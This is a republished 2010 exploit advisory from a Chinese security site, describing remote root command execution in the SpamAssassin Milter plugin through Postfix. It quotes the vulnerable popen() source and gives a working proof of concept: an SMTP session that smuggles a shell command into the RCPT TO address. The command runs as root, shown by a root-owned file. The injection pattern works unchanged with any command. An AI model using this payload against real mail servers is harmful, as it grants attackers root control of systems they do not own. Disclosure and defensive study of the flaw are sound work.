首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Spamassassin Milter Plugin Remote root command execution vulnerability
来源:vfocus.net 作者:Kingcope 发布时间:2010-03-09  
======================================================================
Spamassassin Milter Plugin Remote root command execution vulnerability
======================================================================

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address
expansion */

                char buf[1024];
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a
joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
                        abort();
                }
#endif

                p = popen(buf, "r"); [1]
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Lenovo Hotkey Driver / Access
·Netscape Navigator - Namoroka
·Linux Kernel 64bit Personality
·TopDownloads MP3 Player 1.0 m3
·FreeBSD and OpenBSD 'ftpd' NUL
·Apache 2.2.14 mod_isapi Dangli
·QuickZip 4.x (.zip) 0day Local
·JITed stage-0 shellcode
·QuickZip 4.x (.zip) Buffer Ove
·Yahoo Player v1.0 (.m3u/.pls/.
·BigForum version 4.5 remote SQ
·Flare <= 0.6 Local Heap Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved